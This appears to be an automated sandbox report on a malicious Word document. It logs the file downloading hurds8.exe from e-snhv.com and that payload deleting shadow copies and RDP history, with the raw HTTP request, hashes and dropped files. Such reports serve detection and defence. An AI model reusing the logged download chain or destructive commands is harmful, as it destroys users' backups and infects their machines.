AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
SendTo oNewMsg
MenuMenu = 0
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 3 Then 'Options
j = CheckRectsMenuMenu3
If j = 1 And Not gObjDSound Is Nothing Then If EnableSound Then EnableSound = False Else EnableSound = True
If j = 2 Then cfgm = True
If j = 3 Then cfgm = False
If j = 4 Then cfgk = True: KeyConfig False
If j = 5 Then cfgk = False: KeyConfig True
If j = 6 Then cfgwv = False
If j = 7 Then cfgwv = True
If j = 8 Then MenuMenu = 0
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 4 Then 'Are you sure you want to leave ___ ?'
j = CheckRectsMenuMenu4
If j = 1 Then Stopping = True 'Yes'
If j = 2 Then MenuMenu = 0 'No'
If j > 0 Then Exit Sub 'What the?'
End If
'
If NavMenu = 4 Then
j = CheckRectsMenu4
If j > 0 Then MenuMenu = j: Exit Sub
End If
'
If MenuMenu = 9 Then If CheckRectMenu9 Then MenuMenu = 0
'
j = CheckRectsNav
If j = 1 Then If Not AnimateMenu Then MenuPend = 1: AnimateMenu = True
If j = 3 Then If Not AnimateMenu Then MenuPend = 3: AnimateMenu = True: PlayerSelected = 1
If j = 4 Then If Not AnimateMenu Then MenuPend = 4: AnimateMenu = True
If j = 5 Then DropFlag
If j = 6 Then Weapon = 1: SpecialSnd 1
If j = 7 Then Weapon = 2: SpecialSnd 2
If j = 8 Then Weapon = 3: SpecialSnd 3
If Advertisements Then If CheckRectsAd Then LaunchAd
End Sub
Public Sub sendmsg(cmd As Long, Msgs As String)
On Local Error Resume Next
Dim lMsg As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
lNewOffSet = 0
ReDim oNewMsg(0)
lMsg = cmd
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
AddBufferString oNewMsg, Msgs, lNewOffSet
SendTo oNewMsg
End Sub
Public Sub GameChat(txt As String)
Dim X As Byte
For X = 0 To UBound(Chat)
If X = UBound(Chat) And Chat(X) <> vbNullString Then KillChatLine
If Chat(X) = vbNullString Then
If Chat(0) = vbNullString Then ChatClean = NewGTC
Chat(X) = txt
Exit For
End If
Next
WriteChat
End Sub
Public Sub KillChatLine()
Dim I As Integer
For I = 0 To UBound(Chat) - 1 Step 1
Chat(I) = Chat(I + 1)
Next
Chat(UBound(Chat)) = vbNullString
WriteChat
End Sub
Public Function GetPN(plr As String) As Integer
Dim I As Integer
For I = 1 To UBound(Players)
If LCase$(Players(I).Nick) = LCase$(plr) Then GetPN = I: Exit Function
Next
End Function
Public Sub AddIgnore(plr As String)
Dim I As Integer, j As Integer
j = GetPN(plr)
If Players(j).Admin > 0 Then
GameChat Chr$(5) & "You are not allowed to ignore this player."
Exit Sub
End If
For I = 0 To UBound(Ignored) + 1
If I > UBound(Ignored) Then ReDim Preserve Ignored(I)
If LenB(Ignored(I)) = 0 Then
Ignored(I) = LCase$(plr)
GameChat Chr$(5) & plr & " is ignored."
Exit For
End If
Next
End Sub
Public Function IsIgnored(plr As String) As Boolean
Dim I As Integer
For I = 0 To UBound(Ignored)
If Ignored(I) = LCase$(plr) Then
IsIgnored = True
Exit Function
End If
Next
End Function
Public Sub RemoveIgnore(plr As String)
Dim I As Integer
For I = 0 To UBound(Ignored)
If Ignored(I) = LCase$(plr) Then
Ignored(I) = vbNullString
GameChat Chr$(5) & plr & " is unignored."
Exit For
End If
Next
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "e-snhv.com"
Normalized macro string: "hjbgtg67CHAStrominguatedrop.org"
Normalized macro string: "hjbgtg67CHASswangroup.net"
Normalized macro string: "Playe.rs"
Normalized macro string: "TileG.et"
Normalized macro string: "e-snhv.c\hjbgtg67CHAStringuatedrop.org\af\hjbgtg67CHASswangroup.net\hjbgtg67" - source
- File/Memory
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFB6EDC21982DA276D.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DF5E07CE46EE67FB61.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFA4841D51F65BD667.TMP"
"WINWORD.EXE" created file "%TEMP%\fudziambl8"
"WINWORD.EXE" created file "%TEMP%\hurds8.exe"
"hurds8.exe" created file "%TEMP%\__t6D8E.tmp.bat"
"hurds8.exe" created file "%TEMP%\{e29ac6c0-7037-11de-816d-806e6f6e6963}" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_191"
"Local\WininetConnectionMutex"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"RasPbFile"
"Local\10MU_ACB10_S-1-5-5-0-58053"
"Local\ZoneAttributeCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!local!microsoft!windows!history!history.ie5!"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-58053"
"IESQMMUTEX_0_208"
"Local\ZonesLockedCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"Local\WininetProxyRegistryMutex"
"Local\ZonesCacheCounterMutex"
"Local\c:!users!lctgwmx!appdata!roaming!microsoft!windows!cookies!"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"IESQMMUTEX_0_191"
"Local\WininetStartupMutex"
"Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58053" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "__t6D8E.tmp.bat" as clean (type is "DOS batch file ASCII text with CRLF line terminators")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5F890000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.CreateObject" ...
"WINWORD.EXE" called "WScript.Shell.1.CreateObject" ...
"WINWORD.EXE" called "ADODB.Stream.6.0.CreateObject" ...
"WINWORD.EXE" called "Shell.Application.1.CreateObject" ...
"WINWORD.EXE" called "WScript.Shell.1.Environment" with result: "IDispatch" ...
"WINWORD.EXE" called "WScript.Shell.1("Environment").Item" with result: "%TEMP%\ ...
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.open" ...
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.setRequestHeader" ...
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.send" ...
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.status" with result: "200" ...
"WINWORD.EXE" called "ADODB.Stream.6.0.Type" ...
"WINWORD.EXE" called "ADODB.Stream.6.0.Open" ...
"WINWORD.EXE" called "Microsoft.XMLHTTP.1.0.responseBody" with result: ...
"WINWORD.EXE" called "ADODB.Stream.6.0.Write" ...
"WINWORD.EXE" called "ADODB.Stream.6.0.SaveToFile" ...
"WINWORD.EXE" called "Shell.Application.1.Open" ... - source
- API Call
- relevance
- 10/10
-
Opened the service control manager
- details
- "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "hurds8.exe" was launched with new environment variables: "WecVersionForRosebud.9B0="4""
- source
- Monitored Target
- relevance
- 10/10
-
Requested access to a system service
- details
-
"WINWORD.EXE" called "OpenService" to access the "PcaSvc" service
"WINWORD.EXE" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"WINWORD.EXE" called "OpenService" to access the "RASMAN" service
"WINWORD.EXE" called "OpenService" to access the "rasman" service - source
- API Call
- relevance
- 10/10
-
Runs shell commands
- details
-
"cmd /c %TEMP%\__t6D8E.tmp.bat" on 2017-7-26.18:34:27.326
"cmd /c %TEMP%\__t773C.tmp.bat" on 2017-7-26.18:48:51.976
"cmd /c %TEMP%\tmp7751.tmp.bat" on 2017-7-26.18:48:51.996 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "hurds8.exe"
Spawned process "hurds8.exe" with commandline "-l"
Spawned process "hurds8.exe"
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t6D8E.tmp.bat"
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h"
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t773C.tmp.bat"
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\tmp7751.tmp.bat"
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"__t6D8E.tmp.bat" has type "DOS batch file ASCII text with CRLF line terminators"
"autoexec.bat" has type "data"
"AXE8SharedExpat.dll" has type "data"
"BazisVirtualCDBus.inf" has type "data"
"debugger.chm" has type "MPEG-4 LOAS"
"c2.dll" has type "data"
"AcroExt.exe" has type "data"
"c1.dll" has type "data"
"c1xx.dll" has type "data"
"BIB.dll" has type "data"
"CSS7DATA000A.DLL" has type "data"
"Application Verifier.lnk" has type "data"
"dH1rDN9f9.doc" has type "data"
"ASWhook.dll" has type "data"
"6SZfLTu9z.doc" has type "data"
"AutoItX.chm" has type "data"
"cvtres.exe" has type "data"
"1394dbg.cat" has type "data"
"Au3Check.exe" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F220924C-FB79-4399-B4C9-F5EF5A9228A1}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "e-snhv.com"
Heuristic match: "hjbgtg67CHAStrominguatedrop.org"
Heuristic match: "hjbgtg67CHASswangroup.net"
Heuristic match: "Playe.rs"
Heuristic match: "TileG.et"
Heuristic match: "Microsoft.NET"
Pattern match: "u.cs/MeuN"
Pattern match: "http://www.adobe.com/go/reader_system_reqs_de.&JaFeature-Zustnde"
Pattern match: "kb2.adobe.com/cps/404/kb404946.htmlKBDOCLINK_ERROR_INVDRIVEReaderProcessPopupBrandNameMajorVerDefragResetProgressVirtuelles"
Heuristic match: "1zy}'F|g8J5y4QUq ptcZLCNS>q,h!Nl`_:y}<[Jd}UnK'f|4]37**5pz+vQ#YWLmzUR+9$hTB}n>h?N=qn7g5z,|k*$H5.BF"
Pattern match: "crl.microsoft.com/pki/crl/products/CSPCA.crl0H+"
Pattern match: "crl.microsoft.com/pki/crl/products/tspca.crl0H+"
Pattern match: "http://www.adobe.com/go/reader_system_reqs_de.PROGMSG_IIS_ROLLBACKWEBSERVICEEXTENSIONSCloseRestartRestartManagerOptionReadDEFAULT_VERB3UPDATE_UI_MODE120BLOCK_APP_TIMEOUTBLOCK_ENTRYPOINT_LOGGINGDiese"
Pattern match: "2.rB/v1nqN%5Eo"
Heuristic match: "TCiBYzRC'[R\ZnF|L=r6fuU\Dd>[S 2F.#RTa5C`>E.Zm"
Pattern match: "8ZX.pcaI/edma4"
Heuristic match: "V_[^SVW%UhthPtu]UuYuj6YjTYVgVVV-V-V+V^UVu3ut;ur^]U=pthp`.Yt"
Pattern match: "http://crl.verisign.com/tss-ca.crl0U%0"
Pattern match: "crl.verisign.com/ThawteTimestampingCA.crl0U%0"
Pattern match: "https://www.verisign.com/rpa"
Pattern match: "http://csc3-2010-crl.verisign.com/CSC3-2010.crl0DU"
Pattern match: "http://csc3-2010-aia.verisign.com/CSC3-2010.cer0U#0{&K&0`HB0"
Heuristic match: "_TV2Yg3n3UqLhza^ahZtoQtn8par-#8BM52o!,g+su{]]gu xDno~jOWT^os>{sOO sA_.Vi"
Heuristic match: "0qGveZ,+J}U&\Mc_6e.1rn6 /eNTMBT=R/'S=S'i;SFOV&BkINyb ps.n]v \R7(+9qa/pkI*x%: E,Wh9M D&D<T.th"
Heuristic match: "k;K0&g-@SzCi>w `4z-L+~~q\#gS:Tx--Aj1sC0Eg:`.aL"
Pattern match: "http://crl.thawte.com/ThawtePremiumServerCA.crl0U%0++0U0"
Pattern match: "http://crl.thawte.com/ThawteCodeSigningCA.crl0U%0+"
Pattern match: "www.macrovision.com0"
Heuristic match: "R%]$yh1vwapzp7P\JceK:5K#DY't:!!?Y<CoKQT79[l]wx{Hq)^+s|)1cy},]b#)= KN!%Gu%S~vNDY'|'.nR"
Heuristic match: "<OTk\dW9#CROt0zUzn-BXNu:vDVK9kcH-/xu/FY*dekvd<ydD'l+f_Y65?arkO]#c2M,|3*h.nR"
Pattern match: "DQ5m.QUC/@.K\C"
Pattern match: "GvHRI3.B.WWho/}e="
Heuristic match: "]?Cpf(>R}}??|7}gsa+$('G40=>oA^+0cm[ix&X0W-8y`u^+/sz{#2b=6c-f.?#u&{bm.bD"
Heuristic match: "!bin:V]u.va"
Pattern match: "b.ahQ/uQ|pBE]972"
Pattern match: "www.adobe.com/de"
Pattern match: "7KgDvx.pd/M{M;k0Z"
Pattern match: "d.Tid/TGh_J??6QZT7L"
Pattern match: "p.jWkj/fw8N4?HnGbCMa0A"
Pattern match: "yDXF..UKI/4n!/Z`esf;uA+;/Q%`I~'Ud3Qz*%4pXhLMwM*n7RuN" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e96033f4ef" to virtual address "0x764D4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "2c00000f" to virtual address "0x69E07FA4" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "0c357047" to virtual address "0x6A26F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "ffff33db" to virtual address "0x69C7BE64" (part of module "WINSCARD.DLL")
"WINWORD.EXE" wrote bytes "c24f8f47" to virtual address "0x69EECA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "e92399f6ef" to virtual address "0x764D5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "85c0740e" to virtual address "0x69DEBE64" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "0e8b8db4" to virtual address "0x69DF7FA4" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "8d490200" to virtual address "0x69CA63DC" (part of module "WPFT632.CNV")
"WINWORD.EXE" wrote bytes "e99a54f3ef" to virtual address "0x764D3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "0f8b0b89" to virtual address "0x69CBBE64" (part of module "WPFT632.CNV")
"WINWORD.EXE" wrote bytes "a1bb2644" to virtual address "0x2FCB1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "00000000" to virtual address "0x6BD525E0" (part of module "FM20ENU.DLL")
"WINWORD.EXE" wrote bytes "78636570" to virtual address "0x69E0BE64" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "eb0c7147" to virtual address "0x699C10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "38d65747" to virtual address "0x66630BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "00000000" to virtual address "0x69E163DC" (part of module "MSCONV97.DLL")
"WINWORD.EXE" wrote bytes "0233db8b" to virtual address "0x69DFBE64" (part of module "USP10.DLL")
"WINWORD.EXE" wrote bytes "c4ca8e7780bb8e77aa6e8f779fbb8e7708bb8e7746ce8e7761388f77de2f8f77d0d98e77000000001779a2764f91a2767f6fa276f4f7a27611f7a276f283a276857ea27600000000" to virtual address "0x6BD81000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "99019901" to virtual address "0x69E316CC" (part of module "MSCONV97.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408") - source
- Registry Access
- relevance
- 3/10
File Details
5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
- Filename
- 5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
- Size
- 52KiB (53180 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf
- MD5
- 6c7deb8280c4c27d3ba6bd86fae96eed
- SHA1
- 48094ad2feee6c795eec102fa89d33d381aa3b8a
Screenshots
Hybrid Analysis
Analysed 17 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.doc
(PID: 2480)
-
hurds8.exe
(PID: 3492)
10/62
-
hurds8.exe
-l
(PID: 3448)
10/62
-
hurds8.exe
(PID: 3532)
10/62
-
cmd.exe
cmd /c %TEMP%\__t6D8E.tmp.bat
(PID: 3468)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 1236)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3680)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3668)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3720)
- attrib.exe attrib Default.rdp -s -h (PID: 3736)
-
cmd.exe
cmd /c %TEMP%\__t773C.tmp.bat
(PID: 884)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 1940)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3580)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3576)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3588)
- attrib.exe attrib Default.rdp -s -h (PID: 3572)
- cmd.exe cmd /c %TEMP%\tmp7751.tmp.bat (PID: 1092)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
e-snhv.com | 61.106.62.37 | INAMES CO., LTD. | Korea Republic of |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
61.106.62.37 | 80 TCP | winword.exe PID: 2480 | Korea Republic of |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | Response |
---|---|---|---|
61.106.62.37:80 (e-snhv.com) | GET | e-snhv.com/hjbgtg67 | 200 OK |
Raw request:
GET /hjbgtg67 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding: gzip, deflate
Host: e-snhv.com
Connection: Keep-Alive
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 61.106.62.37:80 (TCP) | A Network Trojan was detected | ET TROJAN Known Malicious Doc Downloading Payload Dec 06 2016 | 2023583 |
Extracted Strings
Extracted Files
Displaying 90 extracted file(s). The remaining 1910 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
__t6D8E.tmp.bat
- Size
- 445B (445 bytes)
- Type
- text
- Description
- DOS batch file, ASCII text, with CRLF line terminators
- AV Scan Result
- 0/58
- Runtime Process
- cmd.exe (PID: 3468)
- MD5
- 32d8f7a3d0c796cee45f64b63c1cca38
- SHA1
- d58466430a2bba8641bd92c880557379e25b140c
- SHA256
- 1a6f73b5c28d1c10f63f2056068c1de61487b8cf8f1dcf7516548df144b3e9ea
-
-
Informative 89
-
-
addons.json
- Size
- 208B (208 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- da360c9bff0b8c8c29298746693ff6be
- SHA1
- 7fc45c83d17764e2370a10e3ffa36d23629305ed
- SHA256
- f37e84b6c43fc8f9dc46bbeec2718c7cf4663ead75ff3d5acb2b4c518d298f88
-
blocklist.xml
- Size
- 147KiB (150320 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 6105f0707e06381b94cffd4791c05a09
- SHA1
- e2d2b222aa8cf1ca04f78df40a690b7a37a8a33d
- SHA256
- db916652c6a1e772dcd92751a8e0193096a53f15069bf90e7e5574881161e3e4
-
cert8.db
- Size
- 112KiB (114864 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 4e426c1a1bfa2f9054458469f7222a34
- SHA1
- d0ff9d2055629b4cc5d1de5a6b2afbbf948d833a
- SHA256
- 1ff4fa44d21ce5c2e0eed44ecc4260e21a7cafbf225c17d4f9865ef757c26258
-
compatibility.ini
- Size
- 384B (384 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- cc727cf6c31189f236d31db46b41ae67
- SHA1
- 224b7300ceb29f6b6d15081d942f97ef62ce4303
- SHA256
- fc55ee9baca582144bd4c15f52e4f64091552b5690d4f2c8fd4a0304f193b56b
-
content-prefs.sqlite
- Size
- 224KiB (229552 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- a8ed4cc1e90010bb0e687367241feec5
- SHA1
- b8cc40d968bb4faa037b96e907c8b95b81fa1a0e
- SHA256
- 959e081f8f6da39fe0291227872c52565cd062ce251a11811878d9c63ca18e4c
-
818200132aebmoouht.sqlite
- Size
- 768KiB (786608 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 9d2e789d5a80e95a08ae105dbe1fb00b
- SHA1
- 5279e072c84b026051ff7ffce949f00f8ad239e4
- SHA256
- ae49460cfd714023b91a7f7121b3b3ce456787f096b7f041cfdd3036536a6c6d
-
~WRS{F220924C-FB79-4399-B4C9-F5EF5A9228A1}.tmp
- Size
- 1KiB (1024 bytes)
- Runtime Process
- WINWORD.EXE (PID: 2480)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Chrysanthemum.jpg
- Size
- 859KiB (879570 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 8a6f19a01026c6b6fd55d22d0aff0966
- SHA1
- b0bf05534459e6825ba40633653cc83ffed43f31
- SHA256
- 8953321b17a0be924b8200deb402197ed81dad533b981abda712f558c104d1cd
-
{e29ac6c0-7037-11de-816d-806e6f6e6963}
- Size
- 1KiB (1026 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 6afdf8455dcfb2f11cf644d7012a1c35
- SHA1
- 99ce97a57a85a4f12a38c4dabb0a9aebb71e3f46
- SHA256
- af327646c79403d95efe54bbf3145e2dec540d7706f0179d87006db6548a37a2
-
Calculator.lnk
- Size
- 1.6KiB (1664 bytes)
- Type
- data
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 9cb48b8146ad04d606142ff323428538
- SHA1
- 7beebbdca1161ac4b16aa1aa14fd5d26d26bf7cb
- SHA256
- 64a2139b19c981d004187750d8a1eded1efad28cf46459631429907eb0d045da
-
04bZ.txt
- Size
- 2MiB (2130096 bytes)
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 07f977aed2d53c4d0fa5e64638e7ac50
- SHA1
- 6c47a3f0b33e15cca0f171382ca8c1cdd6e90c86
- SHA256
- 2a8e8c05568dbd75162b1ba518c329c747035296d23cb68906309bc9687ba83e
-
0pYWspjURe8aqA.exe
- Size
- 1.6MiB (1700016 bytes)
- Type
- data
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 3f99cae0d948a0bbb9812dba814f0075
- SHA1
- cf43581638bad659cea91b129444d8b29b9d38e4
- SHA256
- eee0d399b3d8b8960e84c70f8bb1f08f78a55f448e0c64a31fe45a6c6200d963
-
0zIG0D.doc
- Size
- 1.4MiB (1465520 bytes)
- Type
- data
- Runtime Process
- hurds8.exe (PID: 3532)
- MD5
- 43a5b24a03ef9d24b390713ed319ca63
- SHA1
- 108efb594bdb63ee7d0abe13b308adfe3950ed44
- SHA256
